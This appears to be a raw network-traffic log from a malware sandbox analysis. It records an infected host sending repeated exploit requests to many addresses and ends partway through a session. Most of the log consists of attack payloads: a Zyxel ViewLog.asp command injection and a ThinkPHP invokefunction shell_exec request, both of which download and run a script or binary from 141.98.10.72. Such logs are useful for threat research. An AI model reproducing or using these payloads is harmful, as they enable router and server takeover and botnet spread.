                                                        Feb 14, 2024 09:33:51.943186045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:53.191076040 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.686990976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:00.806828022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:10.790467978 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:31.013535023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.972038984 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        441192.168.2.145754485.158.57.568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.315469027 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:51.521152020 CET396INHTTP/1.0 401 Authentication Required
                                                        WWW-Authenticate: Basic realm="proxy"
                                                        Connection: close
                                                        Content-type: text/html; charset=us-ascii
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 31 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>401 Authentication Required</title></head><body><h2>401 Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        442192.168.2.143587862.242.93.1148080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.333724022 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        443192.168.2.145289494.123.32.928080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:51.393755913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        444192.168.2.145729231.136.222.1498080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:52.127629042 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:55.175097942 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:01.318854094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:13.350269079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:39.205352068 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:28.355266094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        445192.168.2.146049288.221.62.6380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.009476900 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:53.213099003 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:53 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 36 38 66 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 33 26 23 34 36 3b 31 32 63 33 65 33 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a68f1402&#46;1707899633&#46;12c3e3d</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        446192.168.2.144491831.223.184.578080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.414058924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:53.689449072 CET410INHTTP/1.1 301 Moved Permanently
                                                        Server: nginx/1.18.0-nano
                                                        Date: Wed, 14 Feb 2024 08:33:53 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 174
                                                        Connection: keep-alive
                                                        Location: https://192.168.0.14:443/cgi-bin/ViewLog.asp
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 2d 6e 61 6e 6f 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0-nano</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.1454484112.35.255.6780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.537552118 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.1452380112.74.58.18680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.555939913 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:53.899544954 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:33:50 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.144820631.200.49.1968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.632910013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.144828094.122.95.98080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.664793968 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.145458095.101.80.25480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:53.752829075 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:53.968041897 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:53 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:53 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 36 33 33 26 23 34 36 3b 66 66 61 30 30 63 38 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bc91002&#46;1707899633&#46;ffa00c8b</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.143433862.29.44.1068080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.171312094 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.145153431.200.84.398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:55.171355963 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
